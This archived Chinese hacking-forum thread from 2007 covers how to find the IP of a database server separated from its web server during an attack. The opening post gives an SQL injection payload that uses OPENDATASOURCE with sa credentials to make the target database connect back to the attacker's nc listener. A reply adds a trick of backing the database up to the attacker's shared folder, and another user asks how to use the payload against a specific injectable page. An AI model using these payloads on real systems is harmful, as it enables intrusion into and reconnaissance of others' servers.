岁月联盟 - 技术社区 - BBS.SYUE.COM's Archiver

二少 发表于 2007-4-17 17:45

遇到web与database分离时。。。

遇到web与database分离的情况,这个时候如何获得数据库所在服务器的IP地址是至关重要的。

一个简单的方法,前提数据库可以连接Internet,nc本地监听一个端口

利用注入点执行:

[code]SELECT * FROM opendatasource('sqloledb','data source=localip,port;user id=sa;password=sa').data.dbo.data[/code]

查看NC的连接情况就OK了!

如果数据库开了IIS那就备份吧!GoodLuck

掌門豬 发表于 2007-4-21 17:13

**** 作者被禁止或删除 内容自动屏蔽 ****

nmhack 发表于 2007-4-22 00:48

厉害

wyzhack 发表于 2007-4-22 08:04

这个要先看权限的 有sa的话当然是直接ipconfig 了。  或者用别的方式执行命令 查看ip  不行的话再用楼上这招。   还有一种方法不知道可不可行哦 在你的机子上开一个共享目录  用
backup database 数据库名 to disk='ip\共享目录名'  这个时候查看ip连接或者防火墙的提示  也有可能拿到ip的。

晓华 发表于 2007-4-22 18:17

:(*^__^*) 嘻嘻……:

风云逸剑 发表于 2007-4-26 16:32

SELECT * FROM opendatasource('sqloledb','data source=localip,port;user id=sa;password=sa').data.dbo.data
这个怎么用呀?

比如注入点为 :[url]www.xxx.com/xxx.asp?=1008[/url]  
数据库为:1008com
用户用:1008com


我在本地用NC监听一个1234端口,请问下,下边这个如何做相应的改动?

SELECT * FROM opendatasource('sqloledb','data source=localip,port;user id=sa;password=sa').data.dbo.data

除了把port改成1234,还要改那些地方?谢谢了....不懂MSSQL呀

[[i] 本帖最后由 风云逸剑 于 2007-4-26 17:00 编辑 [/i]]

风云逸剑 发表于 2007-5-10 19:47

在线等呀....

一直都不成功...知道的兄弟说下呀!
谢过@

猪猪 发表于 2007-5-11 07:52

回复 #7 风云逸剑 的帖子

('sqloledb','data source=localip,port;user id=sa;password=sa').

仔细看一下这里!

掌門豬 发表于 2007-5-13 11:40

**** 作者被禁止或删除 内容自动屏蔽 ****

页: [1]

Powered by Discuz! Archiver 7.0.0  © 2001-2009 Comsenz Inc.